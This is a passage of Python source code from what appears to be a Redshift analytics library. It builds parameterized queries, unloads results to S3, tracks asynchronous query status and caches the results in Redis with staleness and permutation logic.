self.query.get_default_value_for_filter(filter)\n\n\t\t\t\tif self.query.is_premium or self.query.filter_member_is_premium(filter, filter_member):\n\t\t\t\t\tself.has_premium_values = True\n\n\t\t\t\tfinal_val = filter.resolve_bind_param(param_name, filter_member)\n\n\t\t\t# If we don't have a value then check if there is a default\n\t\t\tif final_val is None and bind.value:\n\t\t\t\tfinal_val = bind.value\n\n\t\t\t# If there is 
no default then check whether it's required (raise exception if it is)\n\t\t\tif final_val is None and bind.required:\n\t\t\t\tmsg = \"Required argument %s has not been provided\" % param_name\n\t\t\t\traise InvalidOrMissingQueryParameterError(msg, self.query.name, param_name)\n\n\t\t\tif final_val is not None:\n\t\t\t\tself.final_bind_params[param_name] = final_val\n\n\tdef verify_required_parameters(self, supplied_parameters):\n\t\tfor param in self.query.required_parameters:\n\t\t\tif param not in supplied_parameters:\n\t\t\t\tmsg = \"Required param %s was not provided\" % param\n\t\t\t\traise InvalidOrMissingQueryParameterError(msg, self.query.name, param)\n\n\tdef _convert_val_to_bind_type(self, val, bind):\n\t\tconverter = bind.type.python_type\n\t\tif converter == date:\n\t\t\treturn datetime.strptime(val, \"%Y-%m-%d\").date()\n\t\telse:\n\t\t\treturn converter(val)\n\n\t@property\n\tdef catalogue(self):\n\t\treturn self.query.catalogue\n\n\t@property\n\tdef is_global(self):\n\t\treturn self.query.global_query\n\n\t@property\n\tdef is_personalized(self):\n\t\treturn self.query.is_personalized\n\n\t@property\n\tdef is_backfillable(self):\n\t\treturn self.query.is_backfillable\n\n\t@property\n\tdef fully_qualified_parameters(self):\n\t\tresult = {}\n\t\tfor available_param in self.query.available_parameters:\n\t\t\tif available_param in self.supplied_parameters:\n\t\t\t\tresult[available_param] = self.supplied_parameters[available_param]\n\t\t\telif is_filter_param(available_param):\n\t\t\t\tdefault_val = self.query.get_default_value_for_filter(\n\t\t\t\t\tget_filter(available_param)\n\t\t\t\t)\n\t\t\t\tresult[available_param] = str(default_val.name)\n\t\t\telse:\n\t\t\t\tresult[available_param] = \"NOT_PROVIDED\"\n\t\treturn result\n\n\t@property\n\tdef supplied_filters_dict(self):\n\t\t# This is mostly useful for capturing metrics related to what is being requested.\n\t\t# It's useful to be able to separate params that are filters and have a small 
bounded\n\t\t# range of values. And those that have an unbounded range for use with tools like\n\t\t# Influx that treat tags and fields differently.\n\t\tresults = {}\n\t\tfor k, v in self.fully_qualified_parameters.items():\n\t\t\tif is_filter_param(k):\n\t\t\t\tresults[k] = str(v)\n\n\t\treturn results\n\n\t@property\n\tdef supplied_non_filters_dict(self):\n\t\tresults = {}\n\t\tfor k, v in self.fully_qualified_parameters.items():\n\t\t\tif not is_filter_param(k):\n\t\t\t\tresults[k] = str(v)\n\n\t\treturn results\n\n\t@property\n\tdef executable_sql(self):\n\t\tengine = self.catalogue.engine\n\t\tcompiled_statement = self.query.stmt.params(\n\t\t\tself.final_bind_params\n\t\t).compile(bind=engine)\n\t\tq = QueryStatementGenerator(engine, compiled_statement)\n\t\treturn q.query\n\n\tdef generate_unload_key(self, prefix=\"\"):\n\t\tnamespace = self.catalogue.s3_unload_namespace\n\t\treturn \"%s/%s/%s/%s_\" % (namespace, self.query_name, self.unload_key, str(prefix))\n\n\tdef generate_unload_location(self, prefix=\"\"):\n\t\ts3_bucket = self.catalogue.s3_unload_bucket\n\t\treturn \"s3://%s/%s\" % (s3_bucket, self.generate_unload_key(prefix))\n\n\tdef executable_unload_statement(self, prefix=\"\"):\n\t\tengine = self.catalogue.engine\n\t\taws_access_key_id = self.catalogue.aws_access_key_id\n\t\taws_secret_access_key = self.catalogue.aws_secret_access_key\n\n\t\tcompiled_statement = self.query.stmt.params(\n\t\t\tself.final_bind_params\n\t\t).compile(bind=engine)\n\t\tq = QueryStatementGenerator(engine, compiled_statement)\n\t\tunload_location = self.generate_unload_location(prefix)\n\n\t\tunload_template = \"\"\"\n\t\t\tUNLOAD ('{select}') TO '{unload_location}'\n\t\t\tACCESS_KEY_ID '{aws_access_key_id}'\n\t\t\tSECRET_ACCESS_KEY '{aws_secret_access_key}'\n\t\t\tMANIFEST\n\t\t\tGZIP\n\t\t\tDELIMITER AS ','\n\t\t\tMAXFILESIZE AS 10 MB\n\t\t\tADDQUOTES\n\t\t\tNULL AS '_N_'\n\t\t\tPARALLEL OFF\n\t\t\tALLOWOVERWRITE\n\t\t\"\"\"\n\n\t\tstmt = 
unload_template.format(\n\t\t\tselect=q.query.replace(\"'\", r\"\\'\"),\n\t\t\tunload_location=unload_location,\n\t\t\taws_access_key_id=aws_access_key_id,\n\t\t\taws_secret_access_key=aws_secret_access_key\n\t\t)\n\n\t\treturn stmt\n\n\tdef __str__(self):\n\t\treturn self.cache_key\n\n\tdef __repr__(self):\n\t\treturn str(self)\n\n\tdef __eq__(self, other):\n\t\tif isinstance(other, ParameterizedRedshiftQuery):\n\t\t\treturn self.cache_key == other.cache_key\n\t\treturn NotImplemented\n\n\tdef schedule_refresh(self, priority=None):\n\t\trefresh_priority = priority or self.query.refresh_priority\n\t\tif refresh_priority == QueryRefreshPriority.IMMEDIATE:\n\t\t\tself.refresh_result(run_async=True)\n\t\telse:\n\t\t\tself.catalogue.scheduler._schedule_refresh(self, refresh_priority)\n\n\tdef preschedule_refresh(self):\n\t\tif self.will_be_stale_at:\n\t\t\tself.catalogue.scheduler._preschedule_refresh(self, self.will_be_stale_at)\n\n\t@property\n\tdef will_be_stale_at(self):\n\t\tif self.query.refresh_interval == QueryRefreshInterval.NEVER:\n\t\t\treturn None\n\t\telse:\n\t\t\ttd = timedelta(seconds=self.query.refresh_interval.max_seconds)\n\t\t\treturn self.result_as_of + td\n\n\t@property\n\tdef refresh_as_of_key(self):\n\t\tprefix = self.query.cache_key_prefix + \":refresh_as_of\"\n\t\toverride_vals = {}\n\t\tfor exclusion in self.query.exclude_from_global_permutations_key:\n\t\t\toverride_vals[exclusion] = \"*\"\n\n\t\treturn self._generate_cache_key([], override_vals=override_vals, prefix=prefix)\n\n\t@property\n\tdef unload_key(self):\n\t\tprefix = self.query.cache_key_prefix + \":unload=True\"\n\t\toverride_vals = {}\n\t\tfor exclusion in self.query.exclude_from_global_permutations_key:\n\t\t\toverride_vals[exclusion] = \"*\"\n\n\t\treturn self._generate_cache_key([], override_vals=override_vals, prefix=prefix)\n\n\t@property\n\tdef refresh_as_of(self):\n\t\tcache = self.query.catalogue.cache\n\t\tas_of_ts = cache.get(self.refresh_as_of_key)\n\t\tif 
as_of_ts:\n\t\t\treturn datetime.utcfromtimestamp(float(as_of_ts))\n\t\telse:\n\t\t\treturn None\n\n\t@property\n\tdef cache_key(self):\n\t\treturn self._generate_cache_key([])\n\n\tdef _generate_cache_key(self, exclusions, override_vals={}, prefix=None):\n\t\tif prefix:\n\t\t\telements = [prefix]\n\t\telse:\n\t\t\telements = [self.query.cache_key_prefix]\n\n\t\tfor available_param in self.query.available_parameters:\n\t\t\tif available_param in exclusions:\n\t\t\t\tcontinue\n\t\t\tif available_param in override_vals:\n\t\t\t\telement = \"%s=%s\" % (available_param, override_vals[available_param])\n\t\t\t\telements.append(element)\n\t\t\telif available_param in self.supplied_parameters:\n\t\t\t\telement = \"%s=%s\" % (available_param, self.supplied_parameters[available_param])\n\t\t\t\telements.append(element)\n\t\t\telif available_param in self.query.required_parameters:\n\t\t\t\traise ValueError(\"Required cache_key_element not found in supplied_parameters: %s\" % available_param)\n\t\t\telse:\n\t\t\t\tif is_filter_param(available_param):\n\t\t\t\t\tfilter = get_filter(available_param)\n\t\t\t\t\tdefault_member = self.query.get_default_value_for_filter(filter)\n\t\t\t\t\telement = \"%s=%s\" % (available_param, default_member.name)\n\t\t\t\telse:\n\t\t\t\t\tdefault_value = self.query.get_default_value(available_param)\n\t\t\t\t\telement = \"%s=%s\" % (available_param, default_value)\n\t\t\t\telements.append(element)\n\n\t\treturn \":\".join(elements)\n\n\t@property\n\tdef cache_key_meta(self):\n\t\treturn self.cache_key + \":meta\"\n\n\t@property\n\tdef query_name(self):\n\t\treturn self.query.name\n\n\t@property\n\tdef params_cache_key(self):\n\t\treturn self.cache_key + \":params\"\n\n\tdef evict_cache(self):\n\t\tcache = self.catalogue.cache\n\t\tcache.delete(self.cache_key)\n\t\tcache.delete(self.params_cache_key)\n\t\tcache.delete(self.refresh_as_of_key)\n\t\tcache.delete(self.cache_key_meta)\n\n\tdef evict_all_from_cache(self):\n\t\treturn 
self.query.evict_all_from_cache()\n\n\tdef mark_stale(self):\n\t\twith self.get_meta_context() as meta:\n\t\t\tmeta[\"is_stale\"] = True\n\n\tdef mark_all_stale(self):\n\t\treturn self.query.mark_all_stale()\n\n\t@property\n\tdef result_as_of(self):\n\t\tmeta = self.read_only_meta\n\t\tas_of_ts = meta.get(\"as_of\", None)\n\t\tif as_of_ts and not self.cached_records_are_invalid:\n\t\t\treturn datetime.utcfromtimestamp(float(as_of_ts))\n\t\telse:\n\t\t\treturn None\n\n\t@property\n\tdef read_only_meta(self):\n\t\tif self.catalogue.cache.exists(self.cache_key_meta):\n\t\t\treturn MappingProxyType(\n\t\t\t\tjson.loads(self.catalogue.cache.get(self.cache_key_meta))\n\t\t\t)\n\t\telse:\n\t\t\treturn MappingProxyType(dict())\n\n\t@property\n\tdef read_only_global_meta(self):\n\t\tif self.catalogue.cache.exists(self.unload_key):\n\t\t\treturn MappingProxyType(\n\t\t\t\tjson.loads(self.catalogue.cache.get(self.unload_key))\n\t\t\t)\n\t\telse:\n\t\t\treturn MappingProxyType(dict())\n\n\tdef get_meta_context(self):\n\t\tif not hasattr(self, \"_meta_context\"):\n\t\t\tself._meta_context = RedshiftQueryMetaContextManager(self)\n\t\treturn self._meta_context\n\n\tdef get_global_meta_context(self):\n\t\tif not hasattr(self, \"_global_meta_context\"):\n\t\t\tself._global_meta_context = RedshiftQueryMetaContextManager(\n\t\t\t\tself,\n\t\t\t\tglobal_context=True\n\t\t\t)\n\t\treturn self._global_meta_context\n\n\t@property\n\tdef cache_is_populated(self):\n\t\tif self.refresh_as_of and not self.cached_records_are_invalid:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\t@property\n\tdef cached_records_are_invalid(self):\n\t\t# This is true when the query SQL is changed.\n\t\t# Any result records in the cache are considered invalid\n\t\tmeta = self.read_only_meta\n\t\tif meta:\n\t\t\treturn meta.get(\"query_hash\", None) != self.query.query_hash\n\t\telse:\n\t\t\treturn False\n\n\t@property\n\tdef result_available(self):\n\t\tcache = self.query.catalogue.cache\n\t\tif 
self.cached_records_are_invalid:\n\t\t\t# If the query_hash has changed then the records are for an old version\n\t\t\t# of the query and are not usable\n\t\t\treturn False\n\n\t\treturn cache.exists(self.cache_key)\n\n\t@property\n\tdef result_is_stale(self):\n\t\tif self.cached_records_are_invalid:\n\t\t\treturn True\n\n\t\tmeta = self.read_only_meta\n\t\tif not meta or meta.get(\"is_stale\", False):\n\t\t\treturn True\n\n\t\tcurrent_dt = datetime.utcnow()\n\t\tcached_as_of_dt = self.result_as_of\n\t\tif not cached_as_of_dt:\n\t\t\treturn True\n\n\t\tseconds_stale = (current_dt - cached_as_of_dt).total_seconds()\n\t\tif self.query.refresh_interval == QueryRefreshInterval.NEVER:\n\t\t\treturn False\n\t\telif seconds_stale > self.query.refresh_interval.max_seconds:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\t@property\n\tdef response_payload_type(self):\n\t\tif self.query.as_csv:\n\t\t\treturn \"text/csv\"\n\t\telse:\n\t\t\treturn \"application/json\"\n\n\t@property\n\tdef response_payload_data(self):\n\t\treturn self._get_response_payload(as_json=True)\n\n\t@property\n\tdef response_payload(self):\n\t\treturn self._get_response_payload(as_json=False)\n\n\t@property\n\tdef response_payload_json(self):\n\t\treturn self._get_response_payload(as_json=True)\n\n\tdef _get_response_payload(self, as_json=False):\n\t\tcache = self.query.catalogue.cache\n\t\tval = cache.get(self.cache_key)\n\t\tif val is None:\n\t\t\tif self.query.raw_series_data:\n\t\t\t\treturn None\n\n\t\t\tres = dict(\n\t\t\t\trender_as=self.query.display_visual.name.lower(),\n\t\t\t\tseries=None,\n\t\t\t)\n\n\t\t\tif as_json:\n\t\t\t\treturn json.dumps(res)\n\t\t\telse:\n\t\t\t\treturn res\n\n\t\tval = zlib.decompress(val).decode(\"utf-8\")\n\n\t\tif as_json or self.query.as_csv:\n\t\t\treturn val\n\t\telse:\n\t\t\treturn json.loads(val)\n\n\tdef refresh_result(self, wlm_queue=None, executor_class=None, run_async: bool=False):\n\t\tif run_async:\n\t\t\treturn 
self._refresh_result_async(wlm_queue, executor_class)\n\t\telse:\n\t\t\treturn self._refresh_result_synchronous(wlm_queue, executor_class)\n\n\tdef _refresh_result_synchronous(self, wlm_queue=None, executor_class=None):\n\t\tif executor_class is None:\n\t\t\texecutor_class = RedshiftCursorQueryExecutor\n\n\t\texecutor = executor_class(self.query)\n\t\tengine = self.query.catalogue.engine\n\t\tcache = self.query.catalogue.cache\n\n\t\tas_of_ts = executor.execute(engine, self, cache, wlm_queue)\n\t\t# Record in the cache the last time the results where refreshed.\n\t\t# This is useful for global queries to be able to determine if a parameter permutation\n\t\t# That is not in cache is missing because the data needs a refresh\n\t\t# Or because that permutation is not valid.\n\t\tcache.set(\n\t\t\tself.refresh_as_of_key,\n\t\t\tas_of_ts,\n\t\t\tex=self.query.cache_ttl_seconds\n\t\t)\n\n\t\treturn as_of_ts\n\n\t@property\n\tdef in_flight(self):\n\t\tengine = self.catalogue.engine\n\t\twith self.get_global_meta_context() as meta:\n\t\t\tquery_handle = meta.get(\"query_handle\", None)\n\t\t\tlogger.info(\"Checking in flight status for: %s\" % query_handle)\n\t\t\twith engine.connect() as conn:\n\t\t\t\tresult = is_in_flight(conn, query_handle)\n\t\t\t\tlogger.info(\"is_in_flight=%s\" % str(result))\n\t\t\t\treturn result\n\n\tdef _update_in_flight_status(self, meta):\n\t\tif \"query_heartbeat\" not in meta or \"query_handle\" not in meta:\n\t\t\tmsg = \"query_heartbeat or query_handle missing from meta dict\"\n\t\t\traise RuntimeError(msg)\n\n\t\tquery_heartbeat = meta[\"query_heartbeat\"]\n\t\tquery_handle = meta[\"query_handle\"]\n\t\tnow_ts = calendar.timegm(datetime.utcnow().utctimetuple())\n\t\tengine = self.catalogue.engine\n\n\t\ttime_delta_seconds = now_ts - query_heartbeat\n\t\tif time_delta_seconds >= self.query.ASYNC_HEARTBEAT_INTERVAL:\n\t\t\twith engine.connect() as conn:\n\t\t\t\tif is_in_flight(conn, query_handle):\n\t\t\t\t\t# The query is still 
running\n\t\t\t\t\tmeta[\"query_heartbeat\"] = now_ts\n\t\t\t\telse:\n\t\t\t\t\t# The query either failed or just finished\n\t\t\t\t\t# Even if we clean up inflight here, the resolution lambda should\n\t\t\t\t\t# resolve without errors.\n\t\t\t\t\tself.cleanup_in_flight_data(meta)\n\t\t\t\t\t# Unload timeout alert\n\t\t\t\t\tif meta.get(\"unload_running\", False) and \"unload_start\" in meta:\n\t\t\t\t\t\tunload_start = meta[\"unload_start\"]\n\t\t\t\t\t\tunload_delta_seconds = now_ts - unload_start\n\t\t\t\t\t\tif unload_delta_seconds > 300: # Lambdas time out after 5 minutes\n\t\t\t\t\t\t\tmeta[\"unload_running\"] = False\n\t\t\t\t\t\t\tmsg = \"Unload timed out: '%s' took more than 300 seconds\"\n\t\t\t\t\t\t\traise RuntimeError(msg % self.unload_key)\n\n\t\t\t\t\t# Informational duration alert\n\t\t\t\t\tif \"most_recent_duration\" in meta:\n\t\t\t\t\t\tmost_recent_duration = meta[\"most_recent_duration\"]\n\t\t\t\t\t\tcurrent_duration = now_ts - meta[\"query_start\"]\n\t\t\t\t\t\tif current_duration > (most_recent_duration * 10):\n\t\t\t\t\t\t\tmsg = \"Query handle %s duration is 10x the previous run\"\n\t\t\t\t\t\t\tlogger.warning(msg % meta[\"query_handle\"])\n\n\tdef refresh_results_from_unload_manifest(self, manifest_key):\n\t\tlogger.info(\"About to aquire meta context\")\n\t\tacquire_start = time.time()\n\t\twith self.get_global_meta_context() as meta:\n\t\t\tacquire_end = time.time()\n\t\t\tlogger.info(\n\t\t\t\t\"Acquiring context took: %i seconds\" % int(acquire_end - acquire_start)\n\t\t\t)\n\t\t\tnow = calendar.timegm(datetime.utcnow().utctimetuple())\n\t\t\tif \"query_start\" in meta:\n\t\t\t\tstart_ts = meta[\"query_start\"]\n\t\t\t\tend_ts = now\n\t\t\t\tmeta[\"query_end\"] = end_ts\n\t\t\t\tduration = end_ts - start_ts\n\t\t\t\tmeta[\"most_recent_duration\"] = duration\n\t\t\t\tlogger.info(\"Query Execution Duration: %s seconds\" % duration)\n\t\t\telse:\n\t\t\t\tstart_ts = now\n\n\t\t\t# Register that we're working on 
unloading\n\t\t\tmeta[\"unload_start\"] = now\n\t\t\tmeta[\"unload_running\"] = True\n\n\t\t\tcursor = S3ManifestCursor(\n\t\t\t\tself,\n\t\t\t\tmanifest_key,\n\t\t\t\tstart_ts,\n\t\t\t\tfetch_size=self.query.fetch_size\n\t\t\t)\n\t\t\tcache = self.catalogue.cache\n\t\t\tlogger.info(\"About to begin updating cache\")\n\t\t\tcache_update_start = time.time()\n\n\t\t\ttry:\n\t\t\t\tself.query.update_cache(self, cursor, cache)\n\t\t\tfinally:\n\t\t\t\tmeta[\"unload_running\"] = False\n\t\t\t\tself.cleanup_in_flight_data(meta)\n\n\t\t\tcache_update_end = time.time()\n\t\t\tcache_update_duration = cache_update_end - cache_update_start\n\t\t\tlogger.info(\n\t\t\t\t\"Updating Cache Took: %s seconds\" % str(round(cache_update_duration, 2))\n\t\t\t)\n\n\t@property\n\tdef most_recent_duration(self):\n\t\tmeta = self.read_only_global_meta\n\t\tif \"most_recent_duration\" in meta:\n\t\t\treturn meta[\"most_recent_duration\"]\n\t\telse:\n\t\t\treturn None\n\n\t@property\n\tdef most_recent_query_handle(self):\n\t\tmeta = self.read_only_global_meta\n\t\tif \"query_handle\" in meta:\n\t\t\treturn meta[\"query_handle\"]\n\t\telse:\n\t\t\treturn None\n\n\tdef cleanup_in_flight_data(self, meta):\n\t\tmeta[\"in_flight\"] = False\n\n\tdef _refresh_result_async(self, wlm_queue=None, executor_class=None):\n\t\tif not self.catalogue.aws_configured:\n\t\t\tmsg = \"An AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and S3_UNLOAD_BUCKET are required.\"\n\t\t\traise RuntimeError(msg)\n\t\tlogger.info(\"Async refreshing query: %s\" % self.unload_key)\n\n\t\tif executor_class is None:\n\t\t\texecutor_class = RedshiftAsyncQueryExecutor\n\n\t\texecutor = executor_class(self.query)\n\t\tengine = self.query.catalogue.engine\n\t\tcache = self.query.catalogue.cache\n\n\t\twith self.get_global_meta_context() as meta:\n\t\t\tif meta.get(\"in_flight\", False):\n\t\t\t\tlogger.info(\"Query is in_flight will update in_flight status\")\n\t\t\t\t# This query is currently running on the cluster\n\t\t\t\t# Update 
the in_flight statistics\n\t\t\t\tself._update_in_flight_status(meta)\n\t\t\telse:\n\t\t\t\tlogger.info(\"Query is not in_flight - will execute UNLOAD statement\")\n\n\t\t\t\t# Launch the query, which should return quickly.\n\t\t\t\tas_of_ts = executor.execute(engine, self, cache, meta)\n\n\t\t\t\t# Record in the cache the last time the results where refreshed.\n\t\t\t\t# This is useful for global queries to be able to determine if a\n\t\t\t\t# parameter permutation that is not in cache is missing because\n\t\t\t\t# the data needs a refresh or because that permutation is not valid.\n\t\t\t\tcache.set(\n\t\t\t\t\tself.refresh_as_of_key,\n\t\t\t\t\tas_of_ts,\n\t\t\t\t\tex=self.query.cache_ttl_seconds\n\t\t\t\t)\n\n\t\t\treturn meta[\"query_start\"]\n\n\tdef generate_params_with_vals(self, override_vals):\n\t\tcopied_supplied_params = copy(self.supplied_parameters)\n\t\tcopied_supplied_params.update(override_vals)\n\t\treturn ParameterizedRedshiftQuery(self.query, copied_supplied_params)\n\n\nclass RedshiftQueryMeta(type):\n\t\"\"\"A Metaclass to provide automatic registration of all queries in the hsredshift.analytics.library package\"\"\"\n\tdef __init__(self, name, bases, dict):\n\t\ttype.__init__(self, name, bases, dict)\n\t\t# Filter out the Query Base Class\n\t\tif name != \"BaseRedshiftQuery\":\n\t\t\tRedshiftCatalogue.register(self)\n\n\n@add_metaclass(RedshiftQueryMeta)\nclass BaseRedshiftQuery(object):\n\tname = None\n\tenabled = True\n\tis_premium = False\n\tis_personalized = False\n\tis_backfillable = False\n\tglobal_query = False\n\traw_series_data = False\n\tas_csv = False\n\tuses_archetypes = False\n\tfetch_size = 10000\n\t# 30 Day TTL (30 * 24 * 60 * 60)\n\tcache_ttl_seconds = 2592000\n\trefresh_interval = QueryRefreshInterval.EVERY_THREE_HOURS\n\trefresh_priority = QueryRefreshPriority.MEDIUM\n\tmeta_lock_wait_seconds = 10\n\tcache_warming_enabled = True\n\tstmt = None\n\tdisplay_visual = None\n\trequired_parameters = []\n\tavailable_parameters = 
[]\n\texclude_from_global_permutations_key = []\n\t# MIN_PILOTS protects privacy and protects from huge result sets\n\tMIN_PILOTS = 10\n\t# MIN_ELIGIBLE_GAMES protects from having having too many results\n\tMIN_ELIGIBLE_GAMES = 400\n\t# MIN_STANDARD_GAMES & MIN_WILD_GAMES ensure we have enough data for statistical significance\n\t# in the context of whatever filters might be further restricting the eligible games\n\tMIN_STANDARD_GAMES = 400\n\tMIN_WILD_GAMES = 200\n\tASYNC_HEARTBEAT_INTERVAL = 60\n\tAPPLICATION_PREFIX = \"RedshiftQuery\"\n\n\tdef __init__(self, catalogue):\n\t\tself.catalogue = catalogue\n\n\tdef __str__(self):\n\t\treturn self.name\n\n\tdef build_full_params(self, partial_params):\n\t\ttransformed_params = self._transform_params(partial_params)\n\t\treturn ParameterizedRedshiftQuery(self, transformed_params)\n\n\tdef _transform_params(self, partial_params):\n\t\tresult = partial_params\n\t\tfor available_param in self.available_parameters:\n\t\t\tif is_filter_param(available_param):\n\t\t\t\tfilter = get_filter(available_param)\n\t\t\t\tresult = filter.transform_supplied_params(result)\n\t\treturn result\n\n\tdef bind_params(self):\n\t\tresult = {}\n\t\tfor param_name, bind in self.stmt.compile().binds.items():\n\t\t\tresult[param_name] = bind\n\t\treturn result\n\n\tdef get_default_value(self, available_param):\n\t\traise NotImplementedError(\"Must be implemented by queries exposing non-required, non-filter parameters\")\n\n\tdef get_default_value_for_filter(self, filter):\n\t\t# Queries whose default value deviates from the norm must sub-class this\n\t\treturn filter.get_default_member()\n\n\tdef get_supported_filter_members(self, filter):\n\t\t# Return the set that have is_enabled = True\n\t\t# Sub-classes can override this method on an individual basis to expose additional filters\n\t\treturn [member for member in filter.__members__.values() if member.is_enabled]\n\n\tdef is_supported_filter_member(self, filter, member):\n\t\treturn member in 
self.get_supported_filter_members(filter)\n\n\tdef filter_member_is_premium(self, filter, filter_member):\n\t\treturn filter_member.is_premium\n\n\t@property\n\tdef query_hash(self):\n\t\tif not hasattr(self, \"_query_hash\"):\n\t\t\tself._query_hash = hashlib.md5(str(self.stmt).encode(\"utf-8\")).hexdigest()\n\t\treturn self._query_hash\n\n\t@property\n\tdef cache_key_prefix(self):\n\t\t\"\"\"Useful for SCAN prefix* to discover what is cached for this query\"\"\"\n\t\treturn \"%s:%s\" % (self.APPLICATION_PREFIX, self.name)\n\n\tdef as_result_set(self):\n\t\treturn ResultSetRedshiftQueryExecutor(self)\n\n\tdef get_available_non_filter_parameters(self):\n\t\treturn [param for param in self.available_parameters if not is_filter_param(param)]\n\n\tdef evict_all_from_cache(self):\n\t\tcount = 0\n\t\tfor permutation in self.generate_cachable_parameter_permutations():\n\t\t\tparameterized_query = self.build_full_params(permutation)\n\t\t\tparameterized_query.evict_cache()\n\t\t\tcount += 1\n\t\treturn count\n\n\tdef mark_all_stale(self):\n\t\tcount = 0\n\t\tfor permutation in self.generate_cachable_parameter_permutations():\n\t\t\tparameterized_query = self.build_full_params(permutation)\n\t\t\tparameterized_query.mark_stale()\n\t\t\tcount += 1\n\t\treturn count\n\n\tdef generate_cachable_parameter_permutations(self):\n\t\tresult = []\n\n\t\tfor parameter_permutation in self.generate_supported_filter_permutations():\n\t\t\tfor non_filter_param in self.get_available_non_filter_parameters():\n\t\t\t\tparameter_permutation[non_filter_param] = \"*\"\n\t\t\tresult.append(parameter_permutation)\n\n\t\treturn result\n\n\tdef generate_personalized_parameter_permutation_bases(self):\n\t\tif not self.is_personalized:\n\t\t\traise RuntimeError(\"Can only generate cachable permutation bases for personalized queries.\")\n\t\treturn self.generate_supported_filter_permutations(exclude=[\"Region\"])\n\n\tdef generate_supported_filter_permutations(self, exclude=[]):\n\t\tfilters = 
[]\n\t\tfor param in self.available_parameters:\n\t\t\tif is_filter_param(param) and param not in exclude:\n\t\t\t\tfilters.append(get_filter(param))\n\n\t\tpermutations = []\n\t\tself._generate_permutations(permutations, [], filters)\n\t\treturn permutations\n\n\tdef _generate_permutations(self, accumulator, members, filters):\n\t\tif len(filters):\n\t\t\tnext_filter = filters.pop()\n\t\t\tfor member in self.get_supported_filter_members(next_filter):\n\t\t\t\tmembers.append(member)\n\t\t\t\tself._generate_permutations(accumulator, members, filters)\n\t\t\t\tmembers.pop()\n\t\t\tfilters.append(next_filter)\n\t\telse:\n\t\t\tfinal_permutation = {}\n\t\t\tfor m in members:\n\t\t\t\tfinal_permutation[m.filter_name()] = m.name\n\t\t\taccumulator.append(final_permutation)\n\n\tdef execute(self, engine, params):\n\t\tresult = self.as_result_set().execute(engine, params, as_json=False)\n\t\tresponse_payload = self.to_response_payload(result, params)\n\t\treturn response_payload\n\n\tdef _prepare_param_overrides(self, non_filter_params, current_non_filter_param_vals):\n\t\tresult = {}\n\t\tfor param, val in zip(non_filter_params, current_non_filter_param_vals):\n\t\t\tfilter_enum = get_filter(param)\n\t\t\tif filter_enum:\n\t\t\t\tfilter_member = filter_enum.from_int(int(val))\n\t\t\t\tresult[param] = filter_member.name\n\t\t\telse:\n\t\t\t\tresult[param] = val\n\t\treturn result\n\n\tdef update_cache(self, params, cursor, cache, pipeline=True, pipeline_batch_size=10000):\n\t\t# cursor is an iterable of row records from the query statement.\n\t\t# cache is a python redis client.\n\t\t# The order by in the query will be preserved in the cursor.\n\t\tatomic_data_units = 0\n\t\tif not self.global_query:\n\t\t\t# This is a query like trending_decks, or cards_included\n\t\t\t# Or it is a query for personalized stats\n\t\t\t# The entire result set will get stored in a single value\n\t\t\trecord_set = []\n\t\t\tfor row in cursor:\n\t\t\t\tatomic_data_units += 
len(row)\n\t\t\t\trecord_set.append(row)\n\n\t\t\tself._send_record_set_to_cache(cache, cursor.as_of, params, record_set)\n\t\t\tmetric_fields = {\n\t\t\t\t\"units\": atomic_data_units,\n\t\t\t}\n\t\t\tmetric_fields.update(\n\t\t\t\tparams.supplied_non_filters_dict\n\t\t\t)\n\t\t\tself.catalogue.metrics.influx_metric(\n\t\t\t\t\"redshift_data_units\",\n\t\t\t\tmetric_fields,\n\t\t\t\tquery_name=params.query_name,\n\t\t\t\t**params.supplied_filters_dict\n\t\t\t)\n\t\telse:\n\t\t\tnon_filter_params = self.exclude_from_global_permutations_key\n\t\t\tcurrent_non_filter_param_vals = None\n\t\t\trecord_set = []\n\t\t\tcurrent_pipeline_batch = 0\n\t\t\tcache_or_pipeline = cache\n\t\t\tif pipeline:\n\t\t\t\tcache_or_pipeline = cache.pipeline(transaction=True)\n\n\t\t\tfor row in cursor:\n\t\t\t\tatomic_data_units += len(row)\n\t\t\t\trow_vals = []\n\t\t\t\tfor non_filter_param in non_filter_params:\n\t\t\t\t\trow_val = row.get(non_filter_param.lower(), None)\n\t\t\t\t\tif not row_val:\n\t\t\t\t\t\traise ValueError(\"a column name must match the non_filter_param\")\n\t\t\t\t\trow_vals.append(row_val)\n\n\t\t\t\tif not current_non_filter_param_vals:\n\t\t\t\t\tcurrent_non_filter_param_vals = row_vals\n\n\t\t\t\tif row_vals == current_non_filter_param_vals:\n\t\t\t\t\trecord_set.append(row)\n\t\t\t\telse:\n\t\t\t\t\tcurrent_val_params = params.generate_params_with_vals(\n\t\t\t\t\t\tdict(self._prepare_param_overrides(\n\t\t\t\t\t\t\tnon_filter_params,\n\t\t\t\t\t\t\tcurrent_non_filter_param_vals\n\t\t\t\t\t\t))\n\t\t\t\t\t)\n\t\t\t\t\tself._send_record_set_to_cache(\n\t\t\t\t\t\tcache_or_pipeline,\n\t\t\t\t\t\tcursor.as_of,\n\t\t\t\t\t\tcurrent_val_params,\n\t\t\t\t\t\trecord_set,\n\t\t\t\t\t)\n\t\t\t\t\tcurrent_pipeline_batch += 1\n\n\t\t\t\t\tmetric_fields = {\n\t\t\t\t\t\t\"units\": 
atomic_data_units,\n\t\t\t\t\t}\n\t\t\t\t\tmetric_fields.update(\n\t\t\t\t\t\tcurrent_val_params.supplied_non_filters_dict\n\t\t\t\t\t)\n\t\t\t\t\tself.catalogue.metrics.influx_metric(\n\t\t\t\t\t\t\"redshift_data_units\",\n\t\t\t\t\t\tmetric_fields,\n\t\t\t\t\t\tquery_name=current_val_params.query_name,\n\t\t\t\t\t\t**current_val_params.supplied_filters_dict\n\t\t\t\t\t)\n\t\t\t\t\tatomic_data_units = 0\n\n\t\t\t\t\t# Reset the record_set buffer for the next chunk of records\n\t\t\t\t\trecord_set = [row]\n\t\t\t\t\tcurrent_non_filter_param_vals = row_vals\n\n\t\t\t\tif pipeline:\n\t\t\t\t\tif current_pipeline_batch >= pipeline_batch_size:\n\t\t\t\t\t\t# The execute statement will reset the pipeline's state\n\t\t\t\t\t\tcache_or_pipeline.execute()\n\t\t\t\t\t\tcurrent_pipeline_batch = 0\n\n\t\t\tif len(record_set):\n\t\t\t\t# Flush the last result to cache\n\t\t\t\tcurrent_val_params = 